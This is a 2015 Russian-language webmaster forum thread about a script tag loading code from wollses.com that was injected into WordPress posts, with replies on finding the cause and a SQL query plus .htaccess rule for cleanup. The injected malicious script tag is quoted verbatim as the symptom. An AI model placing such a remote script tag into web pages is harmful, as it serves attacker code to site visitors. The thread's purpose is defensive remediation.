В записях wp проставился чужеродный js код

(Ответов: 8, Просмотров: 2395)
  1. Дипломник Аватар для Sluchay
    • Регистрация: 25.12.2011
    • Сообщений: 228
    • Репутация: 93
    На одном из сайтов wp, во всех записях проставился вот такой код <script src="//wollses.com/steps"></script>.
    Код появился в разных местах статьи, где-то в центре, где-то в конце статьи. Может кто сталкивался.
    • 1

    Спасибо сказали:

    fizmatik(15.10.2015),
  2. Студент
    • Регистрация: 09.11.2012
    • Сообщений: 70
    • Репутация: 19
    Вот тут написано что это.
    Вот тут написано как лечить.
    • -3
  3. Дипломник Аватар для fizmatik
    • Регистрация: 08.04.2010
    • Сообщений: 161
    • Репутация: 35
    • Webmoney BL: ?
    Sluchay, не нашел как решить?

    https://wordpress.org/support/topic/...-vulnerability тут парень говорит, что проблема в новой версии плагина https://wordpress.org/plugins/shortcodes-ultimate/, но у меня нет такого плагина, а проблема есть

    Shinigami, я так понимаю ты разобрался в вопросе. Если не трудно объясни, что это и откуда берётся
    Последний раз редактировалось fizmatik; 15.10.2015 в 21:05.
    • 0
  4. sudo rm -rf windows 10 Аватар для Feanor184
    • Регистрация: 19.06.2014
    • Сообщений: 822
    • Репутация: 272
    • Webmoney BL: ?
    fizmatik, Если есть подозрение не плагин, для начала - отключи все плагины и проверь, отсталось или нет. Если убралось - дальше методом проб "по одному" включай и смотри. Обычно проблема или в плагине, или в теме - которую взяли непонятно откуда)
    • 1

    Спасибо сказали:

    fizmatik(15.10.2015),
  5. Дипломник Аватар для fizmatik
    • Регистрация: 08.04.2010
    • Сообщений: 161
    • Репутация: 35
    • Webmoney BL: ?
    Feanor184, я так сразу и сделал, но код уже прописан в тексте старых статей, при чем не во всех, а как-то рандомно и он не пропадает при отключении всех плагинов и с дефолтной темой.

    удалить я думаю все найденные вхождения запросом в бд, но хотелось бы найти источник этой гадости
    • 0
  6. sudo rm -rf windows 10 Аватар для Feanor184
    • Регистрация: 19.06.2014
    • Сообщений: 822
    • Репутация: 272
    • Webmoney BL: ?
    fizmatik, тогда вам стоит прогнать сайт на вредонос - желательно локальную копию скачанную.
    • 1

    Спасибо сказали:

    fizmatik(16.10.2015),
  7. Дипломник Аватар для antichatakk
    • Регистрация: 08.07.2015
    • Сообщений: 173
    • Репутация: 5
    • Webmoney BL: ?
    такая же проблема...
    • 0
  8. Опытный Аватар для garhar
    • Регистрация: 13.05.2015
    • Сообщений: 276
    • Репутация: 33
    Сегодня обнаружил с десяток таких исходящих ссылок на одном из сайтов.
    Вот решение:
    В phpmyadmin надо прописать следующий SQL запрос:
    Код:
    UPDATE wp_posts
    SET post_content = REPLACE (post_content, '<script src="//wollses.com/steps"></script>', '')
    А затем, для защиты в .htaccess прописать:
    Код:
    <Files xmlrpc.php>
    order deny,allow
    Deny from all
    </Files>
    • 2

    Спасибо сказали:

    Myroslav(01.02.2018), Plusok(11.05.2016),
  9. Дипломник Аватар для Myroslav
    • Регистрация: 07.08.2011
    • Сообщений: 211
    • Репутация: 23
    Действительно, проблемма с годами не пропала. Инога меняется скрипт. У меня
    Код:
    wollses.com/steps.png
    Чистил так же как советовали в предыдущем посте.
    • 0

Похожие темы

Темы Раздел Ответов Последний пост
Очень длинное тире в статьях и записях
WordPress 1 04.05.2015 00:06
Как заставить работать вики-разметку в записях?
Социальные сети 6 06.07.2014 23:50
Автоматическая накрутка лайков на новых записях в ВК
Социальные сети 8 26.09.2013 22:36
Разбиваем контент в произвольных записях и страницах WordPress на колонки при помощи шорткода
Web программирование 0 13.07.2011 13:33
Разбиваем контент в произвольных записях и страницах WordPress на колонки при помощи шорткода
Дайджест блогосферы 0 13.07.2011 13:33

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры